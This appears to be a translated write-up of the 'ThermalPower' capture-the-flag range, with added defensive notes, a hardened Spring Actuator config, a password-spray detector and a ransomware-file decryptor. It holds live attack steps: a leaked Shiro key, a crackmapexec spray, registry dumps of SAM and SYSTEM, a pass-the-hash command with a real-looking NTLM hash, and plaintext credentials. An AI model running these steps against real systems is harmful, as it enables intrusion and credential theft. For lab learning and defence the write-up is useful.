ThermalPower
Topics covered
Exploiting a heapdump leak
Password spraying
Abusing the SeBackup/SeRestore privileges
Anonymous FTP login
Decompiling an exe
Decrypting ransomware-encrypted files
flag1
fscan picks up the classic heapdump leak:
start infoscan
39.98.119.163:8080 open
39.98.119.163:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.98.119.163:8080 code:302 len:0 title:None 跳转url: http://39.98.119.163:8080/login;jsessionid=901605FC80F2608E8765E64411E1F3A8
[*] WebTitle http://39.98.119.163:8080/login;jsessionid=901605FC80F2608E8765E64411E1F3A8 code:200 len:2936 title:火创能源监控画面管理平台
[+] PocScan http://39.98.119.163:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://39.98.119.163:8080 poc-yaml-springboot-env-unauth spring2
Download http://39.98.119.163:8080/actuator/heapdump and locate the Shiro key inside it:
QZYysgMYhG6/CzIJlVpR2g==
The service turns out to be running as root, so a vshell agent is brought online directly.
First flag obtained:
flag{413dcb5c-d975-48c1-83cd-4afe8efd0145}
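As an added note that is not part of the original write-up: the two fscan hits above come from Spring Boot Actuator endpoints being reachable without authentication. The fragment below is a constructed application.properties pair, the weak setting beside a hardened alternative; the management port and bind address are assumed values, not taken from the target.

```properties
# Weak (constructed): every actuator endpoint, heapdump and env included,
# is served on the application port to anyone who can reach it.
management.endpoints.web.exposure.include=*

# Hardened (constructed, use instead of the line above): expose only what
# monitoring needs, disable the endpoints that dump memory or configuration,
# and bind the management interface to a separate loopback-only port.
management.endpoints.web.exposure.include=health,info
management.endpoint.heapdump.enabled=false
management.endpoint.env.enabled=false
management.server.port=8081
management.server.address=127.0.0.1
```

A heapdump contains whatever the JVM held at that moment; here that was the Shiro cipher key, which is why one downloadable file turned straight into code execution. An exposed heapdump endpoint is therefore a secret-compromise event: closing the endpoint is not enough, the keys that were in memory (Shiro key, datasource passwords, tokens) also need rotating.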
flag2
Upload fscan and gost and continue scanning the internal network:
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.213:22 open
172.22.17.213:8080 open
172.22.17.6:80 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:21 open
[*] alive ports len is: 7
start vulscan
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=3FB0F1211EA6724CDAD95E12E76BE6CE
[*] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=3FB0F1211EA6724CDAD95E12E76BE6CE code:200 len:2936 title:火创能源监控画面管理平台
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
The FTP service allows anonymous access:
ftp://172.22.17.6
It yields the initial-password format.
Filter for the employees whose position is SCADA engineer and combine their account names with their employee IDs into a password dictionary.
Password-spray 172.22.17.6 with it; the chenhua account is found to log in (in fact every account works, the brute force just stops at the first success).
proxychains4 crackmapexec smb 172.22.17.6 -u user.txt -p pass.txt 2>/dev/null
// The --no-bruteforce option can be added: No spray when using file for username and password (user1 => password1, user2 => password2)
chenhua/chenhua@0813
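From the defender's side, the spray above is easy to miss if you only count failures per account, because with one attempt per account it never reaches a lockout threshold. The following added example (not code from the write-up) detects it by counting distinct target accounts per source address. The log lines are a constructed, simplified rendering of Windows Security events (4625 failed logon, 4624 successful logon) as a SIEM might store them; the field names, the window and threshold, and every username except chenhua are assumptions.

```python
"""Added example (not from the write-up): spotting a password spray from
Windows logon events. Sample lines, field names and thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one source walks many accounts with one attempt each and
# stops at the first success, plus a user who simply mistyped their password.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 EventID=4625 Computer=WIN-ENGINEER TargetUser=zhangwei Src=172.22.17.213 Status=0xC000006D
2024-05-01T10:00:02 EventID=4625 Computer=WIN-ENGINEER TargetUser=liqiang Src=172.22.17.213 Status=0xC000006D
2024-05-01T10:00:02 EventID=4625 Computer=WIN-ENGINEER TargetUser=wangfang Src=172.22.17.213 Status=0xC000006D
2024-05-01T10:00:03 EventID=4625 Computer=WIN-ENGINEER TargetUser=zhaolei Src=172.22.17.213 Status=0xC000006D
2024-05-01T10:00:03 EventID=4625 Computer=WIN-ENGINEER TargetUser=sunyan Src=172.22.17.213 Status=0xC000006D
2024-05-01T10:00:04 EventID=4624 Computer=WIN-ENGINEER TargetUser=chenhua Src=172.22.17.213 Status=0x0
2024-05-01T10:02:10 EventID=4625 Computer=WIN-ENGINEER TargetUser=liuyang Src=172.22.17.88 Status=0xC000006D
2024-05-01T10:02:25 EventID=4625 Computer=WIN-ENGINEER TargetUser=liuyang Src=172.22.17.88 Status=0xC000006D
2024-05-01T10:02:40 EventID=4624 Computer=WIN-ENGINEER TargetUser=liuyang Src=172.22.17.88 Status=0x0
"""

WINDOW = timedelta(minutes=5)
MIN_DISTINCT_USERS = 5   # assumption: tune to the environment's normal failure rate


def parse_event(line: str) -> dict:
    """Turn one 'timestamp key=value ...' line into a dict with a datetime 'ts'."""
    ts_text, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.fromisoformat(ts_text)
    return event


def detect_spray(log_text: str, window: timedelta = WINDOW,
                 min_users: int = MIN_DISTINCT_USERS) -> list:
    """Flag each source that fails against >= min_users distinct accounts within
    `window`, and record any account it then logged into inside the same window.

    Counting distinct target users per source, rather than failures per account,
    is what catches a one-attempt-per-account spray: by design such a spray never
    trips a per-account lockout counter.
    """
    events = sorted((parse_event(line) for line in log_text.splitlines() if line.strip()),
                    key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for event in events:
        by_src[event["Src"]].append(event)

    findings = []
    for src, evs in by_src.items():
        failures = [e for e in evs if e["EventID"] == "4625"]
        for i, first in enumerate(failures):
            end = first["ts"] + window
            users = {e["TargetUser"] for e in failures[i:] if e["ts"] <= end}
            if len(users) < min_users:
                continue
            succeeded = sorted({e["TargetUser"] for e in evs
                                if e["EventID"] == "4624" and first["ts"] <= e["ts"] <= end})
            findings.append({"src": src, "first_seen": first["ts"].isoformat(),
                             "distinct_users": len(users), "succeeded_as": succeeded})
            break   # one finding per source is enough to raise an alert
    return findings


if __name__ == "__main__":
    for finding in detect_spray(SAMPLE_EVENTS):
        print(finding)
```

The "succeeded_as" field is the part worth paging someone for: a spray that ends in a 4624 from the same source is exactly the sequence the write-up produced when crackmapexec stopped at chenhua. The mistyped-password user from 172.22.17.88 is not flagged because it never touches more than one account.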
After logging in and checking the user's privileges, the account is indeed in the Backup Operators group, but SeBackupPrivilege and SeRestorePrivilege do not show up in its privilege list.
evil-winrm cannot connect: nmap shows port 5985 is closed, and neither the SeBackupPrivilege tool nor the EnableSeBackupPrivilege tool could enable the privilege. I had wanted to try several approaches, for example:
SeRestorePrivilege to overwrite sticky keys or the accessibility features for privilege escalation
one-click SeRestorePrivilege exploitation tools
SeBackupPrivilege and SeRestorePrivilege via a volume shadow copy or a direct copy, copying the flag or copying SAM and SYSTEM to extract the hashes locally
Later chu0 said the range environment had since been changed and something was broken, so this path could not be completed; the commands are recorded here for reference:
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Get-SeBackupPrivilege
Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite
cd c:\
mkdir Temp
cd Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
reg save c:\Users\Administrator\flag\flag02.txt c:\Temp\flag.txt
download sam
download system
Then, since the administrator hash is fixed, I simply borrowed the shortcut other players used:
proxychains4 crackmapexec smb 172.22.17.6 -u administrator -Hf82292b7ac79b05d5b0e3d302bd0d279
flag{2deae764-d9e4-435f-b660-535e1416963c}
flag3
SCADA.txt on the FTP share seen earlier also records the credentials of the WIN-SCADA host:
Administrator/IYnT3GyCiy3
Continue scanning the 172.22.26.x segment with fscan, then log in to 172.22.26.11:
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:135 open
172.22.26.11:139 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetBios 172.22.26.11 WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
已完成 5/5
[*] 扫描结束,耗时: 4.820145107s
Shortly after logging in, the automated control system starts on its own; clicking the boiler on makes the flag appear.
flag4
Shortly after logging in, the wallpaper is replaced with a ransom note. Copy the ScadaDB.sql.locky file from the desktop and Lockyou.exe from the C: drive to the local machine and decompile the exe with dnSpy.
First look at the file-encryption logic: ScadaDB.sql is encrypted with AES, the initialization vector is written at the very beginning of the encrypted file, and the encrypted file contents are copied after the vector.
So the IV is the first 16 bytes of ScadaDB.sql.locky. What is still needed is AES_KEY. Looking at the AESCrypto class, it uses encryptedAesKey as the ciphertext and privateKey as the private key and RSA-decrypts to obtain AES_KEY. Both the ciphertext and the private key are given, but the private key is in XML format, so to decrypt it yourself you have to convert it to PEM format on a website.
Once AES_KEY is obtained, take the first 16 bytes of the file as the IV, put the remaining ciphertext into CyberChef for AES decryption, and the final flag comes out:
flag{63cd8cd5-151f-4f29-bdc7-f80312888158}
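The decryption path above can be scripted end to end without the "convert the XML key on a website" detour. The following is an added example, not code from the write-up or from Lockyou.exe: it parses a .NET-style RSAKeyValue XML private key directly into a key object, RSA-decrypts a wrapped AES key, and then decrypts a blob laid out as IV || AES-CBC ciphertext. It uses the `cryptography` package and assumes AES-128-CBC with PKCS7 padding and PKCS#1 v1.5 RSA wrapping (the defaults of .NET's AES and RSA.Decrypt with fOAEP=false); the key pair, AES key and ScadaDB.sql contents are constructed for the demo.

```python
"""Added example (not from the write-up): recover an RSA-wrapped AES key from a
.NET XML private key and decrypt an IV-prefixed AES-CBC file. The padding modes
and the whole key/file material below are assumptions, not taken from Lockyou.exe."""
import base64
import os
import xml.etree.ElementTree as ET

from cryptography.hazmat.primitives import padding as sym_padding
from cryptography.hazmat.primitives.asymmetric import padding as asym_padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Constructed stand-in for ScadaDB.sql.
SAMPLE_SQL = b"-- constructed sample\nCREATE TABLE boiler(id INT, state VARCHAR(8));\n"


def _int_to_b64(value: int) -> str:
    """Unsigned big-endian integer -> base64, the encoding .NET RSAParameters XML uses."""
    return base64.b64encode(value.to_bytes((value.bit_length() + 7) // 8, "big")).decode()


def _b64_to_int(text: str) -> int:
    return int.from_bytes(base64.b64decode(text.strip()), "big")


def rsa_private_key_to_xml(key: rsa.RSAPrivateKey) -> str:
    """Emit the <RSAKeyValue> XML that .NET's RSA.ToXmlString(true) produces.
    Used here only to build the constructed sample key."""
    priv = key.private_numbers()
    pub = priv.public_numbers
    fields = [("Modulus", pub.n), ("Exponent", pub.e), ("P", priv.p), ("Q", priv.q),
              ("DP", priv.dmp1), ("DQ", priv.dmq1), ("InverseQ", priv.iqmp), ("D", priv.d)]
    body = "".join(f"<{name}>{_int_to_b64(v)}</{name}>" for name, v in fields)
    return f"<RSAKeyValue>{body}</RSAKeyValue>"


def rsa_private_key_from_xml(xml_text: str) -> rsa.RSAPrivateKey:
    """Parse RSAKeyValue XML straight into a key object, replacing the PEM conversion step."""
    root = ET.fromstring(xml_text)

    def field(tag: str) -> int:
        return _b64_to_int(root.findtext(tag))

    pub = rsa.RSAPublicNumbers(e=field("Exponent"), n=field("Modulus"))
    priv = rsa.RSAPrivateNumbers(p=field("P"), q=field("Q"), d=field("D"),
                                 dmp1=field("DP"), dmq1=field("DQ"),
                                 iqmp=field("InverseQ"), public_numbers=pub)
    return priv.private_key()


def unwrap_aes_key(encrypted_aes_key: bytes, private_key_xml: str) -> bytes:
    """AESCrypto-style unwrap: RSA-decrypt encryptedAesKey with the XML private key.
    PKCS#1 v1.5 is an assumption matching .NET RSA.Decrypt(data, fOAEP=false)."""
    return rsa_private_key_from_xml(private_key_xml).decrypt(
        encrypted_aes_key, asym_padding.PKCS1v15())


def locky_encrypt(plaintext: bytes, aes_key: bytes) -> bytes:
    """Constructed re-creation of the layout the write-up describes:
    a random IV first, then the AES-CBC ciphertext copied after it."""
    iv = os.urandom(16)
    padder = sym_padding.PKCS7(128).padder()
    padded = padder.update(plaintext) + padder.finalize()
    enc = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).encryptor()
    return iv + enc.update(padded) + enc.finalize()


def locky_decrypt(blob: bytes, aes_key: bytes) -> bytes:
    """Decrypt a .locky-style blob: the first 16 bytes are the IV, the rest is ciphertext."""
    iv, body = blob[:16], blob[16:]
    dec = Cipher(algorithms.AES(aes_key), modes.CBC(iv)).decryptor()
    padded = dec.update(body) + dec.finalize()
    unpadder = sym_padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def demo() -> bytes:
    """End to end on constructed material: wrap a fresh AES key with an RSA public
    key, encrypt the sample file, then recover both exactly as done for flag4."""
    victim_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    private_key_xml = rsa_private_key_to_xml(victim_key)   # what dnSpy showed as privateKey
    aes_key = os.urandom(16)
    encrypted_aes_key = victim_key.public_key().encrypt(aes_key, asym_padding.PKCS1v15())
    locky_blob = locky_encrypt(SAMPLE_SQL, aes_key)
    recovered_key = unwrap_aes_key(encrypted_aes_key, private_key_xml)
    return locky_decrypt(locky_blob, recovered_key)


if __name__ == "__main__":
    print(demo().decode())
```

The reason decryption is possible at all is the same one the write-up relies on: the sample carried its own RSA private key and the wrapped AES key, so the hybrid scheme protected nothing. For real incidents the XML parser is the reusable part; whether the padding assumptions hold has to be confirmed against the decompiled AESCrypto class, since a wrong padding mode fails at the RSA step rather than producing garbage silently.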